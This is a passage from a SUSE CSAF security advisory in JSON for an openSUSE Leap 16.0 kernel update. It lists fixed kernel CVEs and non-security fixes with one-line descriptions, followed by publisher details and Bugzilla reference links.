PREEMPT_RT (bsc#1256737).\n- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).\n- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).\n- CVE-2025-71137: octeontx2-pf: fix \"UBSAN: shift-out-of-bounds error\" (bsc#1256760).\n- CVE-2025-71148: net/handshake: restore destructor on submit failure (bsc#1257159).\n- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).\n- CVE-2025-71156: gve: defer interrupt enabling until NAPI registration (bsc#1257167).\n- CVE-2025-71157: RDMA/core: always drop device refcount in ib_del_sub_device_and_put() (bsc#1257168).\n- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).\n- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).\n- CVE-2026-22981: idpf: detach and close netdevs while handling a reset (bsc#1257225).\n- CVE-2026-22982: net: mscc: ocelot: Fix crash when adding interface under a lag (bsc#1257179).\n- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).\n- CVE-2026-22986: gpiolib: fix race condition for gdev-\u003esrcu (bsc#1257276).\n- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).\n- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).\n- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).\n- CVE-2026-22993: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations (bsc#1257180).\n- CVE-2026-22996: net/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv.\n- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).\n- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).\n- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).\n- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).\n- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).\n\nThe following non security issues were fixed:\n\n- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).\n- Add bugnumber to an existing hv_netvsc change (bsc#1257473).\n- Fix locking issue introduced by a CVE backport (bsc#1256975 bsc#1254977).\n- Update config files: disable CONFIG_DEVPORT for arm64 (bsc#1256792)\n- arm64: Update config files. Disable DEVPORT (bsc#1256792)\n- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).\n- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).\n- btrfs: pass fs_info to btrfs_delete_ref_head() (git-fixes).\n- btrfs: scrub: always update btrfs_scrub_progress::last_physical (git-fixes).\n- bus: fsl-mc: Constify fsl_mc_device_match() (jsc#PED-10906 git-fixes).\n- drm/imagination: Wait for FW trace update command completion (git-fixes).\n- drm/msm/a6xx: fix bogus hwcg register updates (git-fixes).\n- ice: use netif_get_num_default_rss_queues() (bsc#1247712).\n- libbpf: Fix -Wdiscarded-qualifiers under C23 (bsc#1257309).\n- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1254447 bsc#1253087).\n- net: mana: Fix incorrect speed reported by debugfs (bsc#1255232).\n- net: mana: Support HW link state events (bsc#1253049).\n- nfsd: adjust WARN_ON_ONCE in revoke_delegation (bsc#1257015).\n- nvme: nvme-fc: move tagset removal to nvme_fc_delete_ctrl() (git-fixes).\n- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).\n- sched/fair: Disable scheduler feature NEXT_BUDDY (bsc#1255459).\n- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256864).\n- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256864).\n- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).\n- selftests: net: fib-onlink-tests: Convert to use namespaces by default (bsc#1255346).\n- slimbus: core: Constify slim_eaddr_equal() (jsc#PED-10906 git-fixes).\n- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748,bsc#1257154).\n- smb: client: update cfid-\u003elast_access_time in open_cached_dir_by_dentry() (git-fixes).\n- smb: improve directory cache reuse for readdir operations (bsc#1252712).\n- tsm-mr: Add TVM Measurement Register support (bsc#1257504).\n- tsm-mr: Add tsm-mr sample code (bsc#1257504).\n- virt: tdx-guest: Expose TDX MRs as sysfs attributes (bsc#1257504).\n- virt: tdx-guest: Refactor and streamline TDREPORT generation (bsc#1257504).\n- virt: tdx-guest: Transition to scoped_cond_guard for mutex operations (bsc#1257504).\n- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).\n- x86/tdx: Add tdx_mcall_extend_rtmr() interface (bsc#1257504).\n- x86/tdx: tdx_mcall_get_report0: Return -EBUSY on TDCALL_OPERAND_BUSY error (bsc#1257504).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Leap-16.0-325",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_20287-1.json"
},
{
"category": "self",
"summary": "SUSE Bug 1205462",
"url": "https://bugzilla.suse.com/1205462"
},
{
"category": "self",
"summary": "SUSE Bug 1214285",
"url": "https://bugzilla.suse.com/1214285"
},
{
"category": "self",
"summary": "SUSE Bug 1215199",
"url": "https://bugzilla.suse.com/1215199"
},
{
"category": "self",
"summary": "SUSE Bug 1235905",
"url": "https://bugzilla.suse.com/1235905"
},
{
"category": "self",
"summary": "SUSE Bug 1242505",
"url": "https://bugzilla.suse.com/1242505"
},
{
"category": "self",
"summary": "SUSE Bug 1242974",
"url": "https://bugzilla.suse.com/1242974"
},
{
"category": "self",
"summary": "SUSE Bug 1242986",
"url": "https://bugzilla.suse.com/1242986"
},
{
"category": "self",
"summary": "SUSE Bug 1243452",
"url": "https://bugzilla.suse.com/1243452"
},
{
"category": "self",
"summary": "SUSE Bug 1243507",
"url": "https://bugzilla.suse.com/1243507"
},
{
"category": "self",
"summary": "SUSE Bug 1243662",
"url": "https://bugzilla.suse.com/1243662"
},
{
"category": "self",
"summary": "SUSE Bug 1246184",
"url": "https://bugzilla.suse.com/1246184"
},
{
"category": "self",
"summary": "SUSE Bug 1246282",
"url": "https://bugzilla.suse.com/1246282"
},
{
"category": "self",
"summary": "SUSE Bug 1247030",
"url": "https://bugzilla.suse.com/1247030"
},
{
"category": "self",
"summary": "SUSE Bug 1247292",
"url": "https://bugzilla.suse.com/1247292"
},
{
"category": "self",
"summary": "SUSE Bug 1247712",
"url": "https://bugzilla.suse.com/1247712"
},
{
"category": "self",
"summary": "SUSE Bug 1248166",
"url": "https://bugzilla.suse.com/1248166"
},
{
"category": "self",
"summary": "SUSE Bug 1248175",
"url": "https://bugzilla.suse.com/1248175"
},
{
"category": "self",
"summary": "SUSE Bug 1248178",
"url": "https://bugzilla.suse.com/1248178"
},
{
"category": "self",
"summary": "SUSE Bug 1248179",
"url": "https://bugzilla.suse.com/1248179"
},
{
"category": "self",
"summary": "SUSE Bug 1248185",
"url": "https://bugzilla.suse.com/1248185"
},
{
"category": "self",
"summary": "SUSE Bug 1248188",
"url": "https://bugzilla.suse.com/1248188"
},
{
"category": "self",
"summary": "SUSE Bug 1248196",
"url": "https://bugzilla.suse.com/1248196"
},
{
"category": "self",
"summary": "SUSE Bug 1248206",
"url": "https://bugzilla.suse.com/1248206"
},
{
"category": "self",
"summary": "SUSE Bug 1248208",
"url": "https://bugzilla.suse.com/1248208"
},
{
"category": "self",
"summary": "SUSE Bug 1248209",
"url": "https://bugzilla.suse.com/1248209"
},
{
"category": "self",
"summary": "SUSE Bug 1248211",
"url": "https://bugzilla.suse.com/1248211"
},
{
"category": "self",
"summary": "SUSE Bug 1248212",
"url": "https://bugzilla.suse.com/1248212"
},
{
"category": "self",
"summary": "SUSE Bug 1248213",
"url": "https://bugzilla.suse.com/1248213"
},
{
"category": "self",
"summary": "SUSE Bug 1248214",
"url": "https://bugzilla.suse.com/1248214"
},
{
"category": "self",
"summary": "SUSE Bug 1248216",
"url": "https://bugzilla.suse.com/1248216"
},
{
"category": "self",
"summary": "SUSE Bug 1248217",
"url": "https://bugzilla.suse.com/1248217"
},
{
"category": "self",
"summary": "SUSE Bug 1248222",
"url": "https://bugzilla.suse.com/1248222"
},
{
"category": "self",
"summary": "SUSE Bug 1248227",
"url": "https://bugzilla.suse.com/1248227"
},
{
"category": "self",
"summary": "SUSE Bug 1248228",
"url": "https://bugzilla.suse.com/1248228"
},
{
"category": "self",
"summary": "SUSE Bug 1248229",
"url": "https://bugzilla.suse.com/1248229"
},
{
"category": "self",
"summary": "SUSE Bug 1248232",
"url": "https://bugzilla.suse.com/1248232"
},
{
"category": "self",
"summary": "SUSE Bug 1248234",
"url": "https://bugzilla.suse.com/1248234"
},
{
"category": "self",
"summary": "SUSE Bug 1248240",
"url": "https://bugzilla.suse.com/1248240"
},
{
"category": "self",
"summary": "SUSE Bug 1248360",
"url": "https://bugzilla.suse.com/1248360"
},
{
"category": "self",
"summary": "SUSE Bug 1248366",
"url": "https://bugzilla.suse.com/1248366"
},
{
"category": "self",
"summary": "SUSE Bug 1248384",
"url": "https://bugzilla.suse.com/1248384"
},
{
"category": "self",
"summary": "SUSE Bug 1248626",
"url": "https://bugzilla.suse.com/1248626"
},
{
"category": "self",
"summary": "SUSE Bug 1249307",
"url": "https://bugzilla.suse.com/1249307"
},
{
"category": "self",
"summary": "SUSE Bug 1249609",
"url": "https://bugzilla.suse.com/1249609"
},
{
"category": "self",
"summary": "SUSE Bug 1249895",
"url": "https://bugzilla.suse.com/1249895"
},
{
"category": "self",
"summary": "SUSE Bug 1249998",
"url": "https://bugzilla.suse.com/1249998"
},
{
"category": "self",
"summary": "SUSE Bug 1250032",
"url": "https://bugzilla.suse.com/1250032"
},
{
"category": "self",
"summary": "SUSE Bug 1250082",
"url": "https://bugzilla.suse.com/1250082"
},
{
"category": "self",
"summary": "SUSE Bug 1250388",
"url": "https://bugzilla.suse.com/1250388"
},
{
"category": "self",
"summary": "SUSE Bug 1250705",
"url": "https://bugzilla.suse.com/1250705"
},
{
"category": "self",
"summary": "SUSE Bug 1250738",
"url": "https://bugzilla.suse.com/1250738"
},
{
"category": "self",
"summary": "SUSE Bug 1250748",
"url": "https://bugzilla.suse.com/1250748"
},
{
"category": "self",
"summary": "SUSE Bug 1252712",
"url": "https://bugzilla.suse.com/1252712"
},
{
"category": "self",
"summary": "SUSE Bug 1252773",
"url": "https://bugzilla.suse.com/1252773"
},
{
"category": "self",
"summary": "SUSE Bug 1252784",
"url": "https://bugzilla.suse.com/1252784"
},
{
"category": "self",
"summary": "SUSE Bug 1252891",
"url": "https://bugzilla.suse.com/1252891"
},
{
"category": "self",
"summary": "SUSE Bug 1252900",
"url": "https://bugzilla.suse.com/1252900"
},
{
"category": "self",
"summary": "SUSE Bug 1253049",
"url": "https://bugzilla.suse.com/1253049"
},
{
"category": "self",
"summary": "SUSE Bug 1253078",
"url": "https://bugzilla.suse.com/1253078"
},
{
"category": "self",
"summary": "SUSE Bug 1253079",
"url": "https://bugzilla.suse.com/1253079"
},
{
"category": "self",
"summary": "SUSE Bug 1253087",
"url": "https://bugzilla.suse.com/1253087"
},
{
"category": "self",
"summary": "SUSE Bug 1253344",
"url": "https://bugzilla.suse.com/1253344"
},
{
"category": "self",
"summary": "SUSE Bug 1253500",
"url": "https://bugzilla.suse.com/1253500"
},
{
"category": "self",
"summary": "SUSE Bug 1253739",
"url": "https://bugzilla.suse.com/1253739"
},
{
"category": "self",
"summary": "SUSE Bug 1254244",
"url": "https://bugzilla.suse.com/1254244"
},
{
"category": "self",
"summary": "SUSE Bug 1254308",
"url": "https://bugzilla.suse.com/1254308"
},
{
"category": "self",
"summary": "SUSE Bug 1254447",
"url": "https://bugzilla.suse.com/1254447"
},
{
"category": "self",
"summary": "SUSE Bug 1254839",
"url": "https://bugzilla.suse.com/1254839"
},
{
"category": "self",
"summary": "SUSE Bug 1254842",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "self",
"summary": "SUSE Bug 1254845",
"url": "https://bugzilla.suse.com/1254845"
},
{
"category": "self",
"summary": "SUSE Bug 1254977",
"url": "https://bugzilla.suse.com/1254977"
},
{
"category": "self",
"summary": "SUSE Bug 1255102",
"url": "https://bugzilla.suse.com/1255102"
},
{
"category": "self",
"summary": "SUSE Bug 1255128",
"url": "https://bugzilla.suse.com/1255128"
},
{
"category": "self",
"summary": "SUSE Bug 1255157",
"url": "https://bugzilla.suse.com/1255157"
},
{
"category": "self",
"summary": "SUSE Bug 1255164",
"url": "https://bugzilla.suse.com/1255164"
},
{
"category": "self",
"summary": "SUSE Bug 1255172",
"url": "https://bugzilla.suse.com/1255172"
},
{
"category": "self",
"summary": "SUSE Bug 1255216",
"url": "https://bugzilla.suse.com/1255216"
},
{
"category": "self",
"summary": "SUSE Bug 1255232",
"url": "https://bugzilla.suse.com/1255232"
},
{
"category": "self",
"summary": "SUSE Bug 1255241",
"url": "https://bugzilla.suse.com/1255241"
},
{
"category": "self",
"summary": "SUSE Bug 1255245",
"url": "https://bugzilla.suse.com/1255245"
},
{
"category": "self",
"summary": "SUSE Bug 1255266",
"url": "https://bugzilla.suse.com/1255266"
},
{
"category": "self",
"summary": "SUSE Bug 1255268",
"url": "https://bugzilla.suse.com/1255268"
},
{
"category": "self",
"summary": "SUSE Bug 1255269",
"url": "https://bugzilla.suse.com/1255269"
},
{
"category": "self",
"summary": "SUSE Bug 1255319",
"url": "https://bugzilla.suse.com/1255319"
},
{
"category": "self",
"summary": "SUSE Bug 1255327",
"url": "https://bugzilla.suse.com/1255327"
},
{
"category": "self",
"summary": "SUSE Bug 1255346",
"url": "https://bugzilla.suse.com/1255346"
},
{
"category": "self",
"summary": "SUSE Bug 1255403",
"url": "https://bugzilla.suse.com/1255403"
},
{
"category": "self",
"summary": "SUSE Bug 1255417",
"url": "https://bugzilla.suse.com/1255417"
},
{
"category": "self",
"summary": "SUSE Bug 1255459",
"url": "https://bugzilla.suse.com/1255459"
},
{
"category": "self",
"summary": "SUSE Bug 1255482",
"url": "https://bugzilla.suse.com/1255482"
},
{
"category": "self",
"summary": "SUSE Bug 1255506",
"url": "https://bugzilla.suse.com/1255506"
},
{
"category": "self",
"summary": "SUSE Bug 1255526",
"url": "https://bugzilla.suse.com/1255526"
},
{
"category": "self",
"summary": "SUSE Bug 1255527",
"url": "https://bugzilla.suse.com/1255527"
},
{
"category": "self",
"summary": "SUSE Bug 1255529",
"url": "https://bugzilla.suse.com/1255529"
},
{
"category": "self",
"summary": "SUSE Bug 1255530",
"url": "https://bugzilla.suse.com/1255530"
},
{
"category": "self",
"summary": "SUSE Bug 1255536",
"url": "https://bugzilla.suse.com/1255536"
},
{
"category": "self",
"summary": "SUSE Bug 1255537",
"url": "https://bugzilla.suse.com/1255537"
},
{
"category": "self",
"summary": "SUSE Bug 1255542",
"url": "https://bugzilla.suse.com/1255542"
},
{
"category": "self",
"summary": "SUSE Bug 1255544",
"url": "https://bugzilla.suse.com/1255544"
},
{
"category": "self",
"summary": "SUSE Bug 1255547",
"url": "https://bugzilla.suse.com/1255547"
},
{
"category": "self",
"summary": "SUSE Bug 1255569",
"url": "https://bugzilla.suse.com/1255569"
},
{
"category": "self",
"summary": "SUSE Bug 1255593",
"url": "https://bugzilla.suse.com/1255593"
},
{
"category": "self",
"summary": "SUSE Bug 1255622",
"url": "https://bugzilla.suse.com/1255622"
},
{
"category": "self",
"summary": "SUSE Bug 1255694",
"url": "https://bugzilla.suse.com/1255694"
},
{
"category": "self",
"summary": "SUSE Bug 1255695",
"url": "https://bugzilla.suse.com/1255695"
},
{
"category": "self",
"summary": "SUSE Bug 1255703",
"url": "https://bugzilla.suse.com/1255703"
},
{
"category": "self",
"summary": "SUSE Bug 1255708",
"url": "https://bugzilla.suse.com/1255708"
},
{
"category": "self",
"summary": "SUSE Bug 1255811",
"url": "https://bugzilla.suse.com/1255811"
},
{
"category": "self",
"summary": "SUSE Bug 1255930",
"url": "https://bugzilla.suse.com/1255930"
},
{
"category": "self",
"summary": "SUSE Bug 1256579",
"url": "https://bugzilla.suse.com/1256579"
},
{
"category": "self",
"summary": "SUSE Bug 1256582",
"url": "https://bugzilla.suse.com/1256582"
},
{
"category": "self",
"summary": "SUSE Bug 1256584",
"url": "https://bugzilla.suse.com/1256584"
},
{
"category": "self",
"summary": "SUSE Bug 1256586",
"url": "https://bugzilla.suse.com/1256586"
},
{
"category": "self",
"summary": "SUSE Bug 1256591",
"url": "https://bugzilla.suse.com/1256591"
},
{
"category": "self",
"summary": "SUSE Bug 1256592",
"url": "https://bugzilla.suse.com/1256592"
},
{
"category": "self",
"summary": "SUSE Bug 1256593",
"url": "https://bugzilla.suse.com/1256593"
},
{
"category": "self",
"summary": "SUSE Bug 1256594",
"url": "https://bugzilla.suse.com/1256594"
},
{
"category": "self",
"summary": "SUSE Bug 1256597",
"url": "https://bugzilla.suse.com/1256597"
},
{
"category": "self",
"summary": "SUSE Bug 1256605",
"url": "https://bugzilla.suse.com/1256605"
},
{
"category": "self",
"summary": "SUSE Bug 1256607",
"url": "https://bugzilla.suse.com/1256607"
},
{
"category": "self",
"summary": "SUSE Bug 1256608",
"url": "https://bugzilla.suse.com/1256608"
},
{
"category": "self",
"summary": "SUSE Bug 1256609",
"url": "https://bugzilla.suse.com/1256609"
},
{
"category": "self",
"summary": "SUSE Bug 1256610",
"url": "https://bugzilla.suse.com/1256610"
},
{
"category": "self",
"summary": "SUSE Bug 1256611",
"url": "https://bugzilla.suse.com/1256611"
},
{
"category": "self",
"summary": "SUSE Bug 1256612",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "self",
"summary": "SUSE Bug 1256613",
"url": "https://bugzilla.suse.com/1256613"
},
{
"category": "self",
"summary": "SUSE Bug 1256616",
"url": "https://bugzilla.suse.com/1256616"
},
{
"category": "self",
"summary": "SUSE Bug 1256617",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "self",
"summary": "SUSE Bug 1256619",
"url": "https://bugzilla.suse.com/1256619"
},
{
"category": "self",
"summary": "SUSE Bug 1256622",
"url": "https://bugzilla.suse.com/1256622"
},
{
"category": "self",
"summary": "SUSE Bug 1256623",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "self",
"summary": "SUSE Bug 1256625",
"url": "https://bugzilla.suse.com/1256625"
},
{
"category": "self",
"summary": "SUSE Bug 1256627",
"url": "https://bugzilla.suse.com/1256627"
},
{
"category": "self",
"summary": "SUSE Bug 1256628",
"url": "https://bugzilla.suse.com/1256628"
},
{
"category": "self",
"summary": "SUSE Bug 1256630",
"url": "https://bugzilla.suse.com/1256630"
},
{
"category": "self",
"summary": "SUSE Bug 1256632",
"url": "https://bugzilla.suse.com/1256632"
},
{
"category": "self",
"summary": "SUSE Bug 1256638",
"url": "https://bugzilla.suse.com/1256638"
},
{
"category": "self",
"summary": "SUSE Bug 1256641",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "self",
"summary": "SUSE Bug 1256643",
"url": "https://bugzilla.suse.com/1256643"
},
{
"category": "self",
"summary": "SUSE Bug 1256645",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "self",
"summary": "SUSE Bug 1256646",
"url": "https://bugzilla.suse.com/1256646"
},
{
"category": "self",
"summary": "SUSE Bug 1256650",
"url": "https://bugzilla.suse.com/1256650"
},
{
"category": "self",
"summary": "SUSE Bug 1256651",
"url": "https://bugzilla.suse.com/1256651"
},
{
"category": "self",
"summary": "SUSE Bug 1256653",
"url": "https://bugzilla.suse.com/1256653"
},
{
"category": "self",
"summary": "SUSE Bug 1256654",
"url": "https://bugzilla.suse.com/1256654"
},
{
"category": "self",
"summary": "SUSE Bug 1256655",
"url": "https://bugzilla.suse.com/1256655"
},
{
"category": "self",
"summary": "SUSE Bug 1256656",
"url": "https://bugzilla.suse.com/1256656"
},
{
"category": "self",
"summary": "SUSE Bug 1256659",
"url": "https://bugzilla.suse.com/1256659"
},
{
"category": "self",
"summary": "SUSE Bug 1256660",
"url": "https://bugzilla.suse.com/1256660"
},
{
"category": "self",
"summary": "SUSE Bug 1256661",
"url": "https://bugzilla.suse.com/1256661"
},
{
"category": "self",
"summary": "SUSE Bug 1256664",
"url": "https://bugzilla.suse.com/1256664"
},
{
"category": "self",
"summary": "SUSE Bug 1256665",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "self",
"summary": "SUSE Bug 1256667",
"url": "https://bugzilla.suse.com/1256667"
},
{
"category": "self",
"summary": "SUSE Bug 1256668",
"url": "https://bugzilla.suse.com/1256668"
},
{
"category": "self",
"summary": "SUSE Bug 1256674",
"url": "https://bugzilla.suse.com/1256674"
},
{
"category": "self",
"summary": "SUSE Bug 1256677",
"url": "https://bugzilla.suse.com/1256677"
},
{
"category": "self",
"summary": "SUSE Bug 1256680",
"url": "https://bugzilla.suse.com/1256680"
},
{
"category": "self",
"summary": "SUSE Bug 1256682",
"url": "https://bugzilla.suse.com/1256682"
},
{
"category": "self",
"summary": "SUSE Bug 1256683",
"url": "https://bugzilla.suse.com/1256683"
},
{
"category": "self",
"summary": "SUSE Bug 1256688",
"url": "https://bugzilla.suse.com/1256688"
},
{
"category": "self",
"summary": "SUSE Bug 1256689",
"url": "https://bugzilla.suse.com/1256689"
},
{
"category": "self",
"summary": "SUSE Bug 1256716",
"url": "https://bugzilla.suse.com/1256716"
},
{
"category": "self",
"summary": "SUSE Bug 1256726",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "self",
"summary": "SUSE Bug 1256728",
"url": "https://bugzilla.suse.com/1256728"
},
{
"category": "self",
"summary": "SUSE Bug 1256730",
"url": "https://bugzilla.suse.com/1256730"
},
{
"category": "self",
"summary": "SUSE Bug 1256733",
"url": "https://bugzilla.suse.com/1256733"
},
{
"category": "self",
"summary": "SUSE Bug 1256737",
"url": "https://bugzilla.suse.com/1256737"
},
{
"category": "self",
"summary": "SUSE Bug 1256741",
"url": "https://bugzilla.suse.com/1256741"
},
{
"category": "self",
"summary": "SUSE Bug 1256742",
"url": "https://bugzilla.suse.com/1256742"
},
{
"category": "self",
"summary": "SUSE Bug 1256744",
"url": "https://bugzilla.suse.com/1256744"
},
{
"category": "self",
"summary": "SUSE Bug 1256748",
"url": "https://bugzilla.suse.com/1256748"
},
{
"category": "self",
"summary": "SUSE Bug 1256749",
"url": "https://bugzilla.suse.com/1256749"
},
{
"category": "self",
"summary": "SUSE Bug 1256752",
"url": "https://bugzilla.suse.com/1256752"
},
{
"category": "self",
"summary": "SUSE Bug 1256754",
"url": "https://bugzilla.suse.com/1256754"
},
{
"category": "self",
"summary": "SUSE Bug 1256755",
"url": "https://bugzilla.suse.com/1256755"
},
{
"category": "self",
"summary": "SUSE Bug 1256756",
"url": "https://bugzilla.suse.com/1256756"
},
{
"category": "self",
"summary": "SUSE Bug 1256757",
"url": "https://bugzilla.suse.com/1256757"
},
{
"category": "self",
"summary": "SUSE Bug 1256759",
"url": "https://bugzilla.suse.com/1256759"
},
{
"category": "self",
"summary": "SUSE Bug 1256760",
"url": "https://bugzilla.suse.com/1256760"
},
{
"category": "self",
"summary": "SUSE Bug 1256761",
"url": "https://bugzilla.suse.com/1256761"
},
{
"category": "self",
"summary": "SUSE Bug 1256763",
"url": "https://bugzilla.suse.com/1256763"
},
{
"category": "self",
"summary": "SUSE Bug 1256770",
"url": "https://bugzilla.suse.com/1256770"
},
{
"category": "self",
"summary": "SUSE Bug 1256773",
"url": "https://bugzilla.suse.com/1256773"
},
{
"category": "self",
"summary": "SUSE Bug 1256774",
"url": "https://bugzilla.suse.com/1256774"
},
{
"category": "self",
"summary": "SUSE Bug 1256777",
"url": "https://bugzilla.suse.com/1256777"
},
{
"category": "self",
"summary": "SUSE Bug 1256779",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "self",
"summary": "SUSE Bug 1256781",
"url": "https://bugzilla.suse.com/1256781"
},
{
"category": "self",
"summary": "SUSE Bug 1256785",
"url": "https://bugzilla.suse.com/1256785"
},
{
"category": "self",
"summary": "SUSE Bug 1256792",
"url": "https://bugzilla.suse.com/1256792"
},
{
"category": "self",
"summary": "SUSE Bug 1256793",
"url": "https://bugzilla.suse.com/1256793"
},
{
"category": "self",
"summary": "SUSE Bug 1256794",
"url": "https://bugzilla.suse.com/1256794"
},
{
"category": "self",
"summary": "SUSE Bug 1256864",
"url": "https://bugzilla.suse.com/1256864"
},
{
"category": "self",
"summary": "SUSE Bug 1256865",
"url": "https://bugzilla.suse.com/1256865"
},
{
"category": "self",
"summary": "SUSE Bug 1256867",
"url": "https://bugzilla.suse.com/1256867"
},
{
"category": "self",
"summary": "SUSE Bug 1256975",
"url": "https://bugzilla.suse.com/1256975"
},
{
"category": "self",
"summary": "SUSE Bug 1257015",
"url": "https://bugzilla.suse.com/1257015"
},
{
"category": "self",
"summary": "SUSE Bug 1257035",
"url": "https://bugzilla.suse.com/1257035"
},
{
"category": "self",
"summary": "SUSE Bug 1257053",
"url": "https://bugzilla.suse.com/1257053"
},
{
"category": "self",
"summary": "SUSE Bug 1257154",
"url": "https://bugzilla.suse.com/1257154"
},
{
"category": "self",
"summary": "SUSE Bug 1257155",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "self",
"summary": "SUSE Bug 1257158",
"url": "https://bugzilla.suse.com/1257158"
},
{
"category": "self",
"summary": "SUSE Bug 1257159",
"url": "https://bugzilla.suse.com/1257159"
},
{
"category": "self",
"summary": "SUSE Bug 1257163",
"url": "https://bugzilla.suse.com/1257163"
},
{
"category": "self",
"summary": "SUSE Bug 1257164",
"url": "https://bugzilla.suse.com/1257164"
},
{
"category": "self",
"summary": "SUSE Bug 1257167",
"url": "https://bugzilla.suse.com/1257167"
},
{
"category": "self",
"summary": "SUSE Bug 1257168",
"url": "https://bugzilla.suse.com/1257168"
},
{
"category": "self",
"summary": "SUSE Bug 1257179",
"url": "https://bugzilla.suse.com/1257179"
},
{
"category": "self",
"summary": "SUSE Bug 1257180",
"url": "https://bugzilla.suse.com/1257180"
},
{
"category": "self",
"summary": "SUSE Bug 1257202",
"url": "https://bugzilla.suse.com/1257202"
},
{
"category": "self",
"summary": "SUSE Bug 1257204",
"url": "https://bugzilla.suse.com/1257204"
},
{
"category": "self",
"summary": "SUSE Bug 1257207",
"url": "https://bugzilla.suse.com/1257207"
},
{
"category": "self",
"summary": "SUSE Bug 1257208",
"url": "https://bugzilla.suse.com/1257208"
},
{
"category": "self",
"summary": "SUSE Bug 1257215",
"url": "https://bugzilla.suse.com/1257215"
},
{
"category": "self",
"summary": "SUSE Bug 1257217",
"url": "https://bugzilla.suse.com/1257217"
},
{
"category": "self",
"summary": "SUSE Bug 1257218",
"url": "https://bugzilla.suse.com/1257218"
},
{
"category": "self",
"summary": "SUSE Bug 1257220",
"url": "https://bugzilla.suse.com/1257220"
},
{
"category": "self",
"summary": "SUSE Bug 1257221",
"url": "https://bugzilla.suse.com/1257221"
},
{
"category": "self",
"summary": "SUSE Bug 1257225",
"url": "https://bugzilla.suse.com/1257225"
},
{
"category": "self",
"summary": "SUSE Bug 1257227",
"url": "https://bugzilla.suse.com/1257227"
},
{
"category": "self",
"summary": "SUSE Bug 1257232",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "self",
"summary": "SUSE Bug 1257234",
"url": "https://bugzilla.suse.com/1257234"
},
{
"category": "self",
"summary": "SUSE Bug 1257236",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "self",
"summary": "SUSE Bug 1257243",
"url": "https://bugzilla.suse.com/1257243"
},
{
"category": "self",
"summary": "SUSE Bug 1257245",
"url": "https://bugzilla.suse.com/1257245"
},
{
"category": "self",
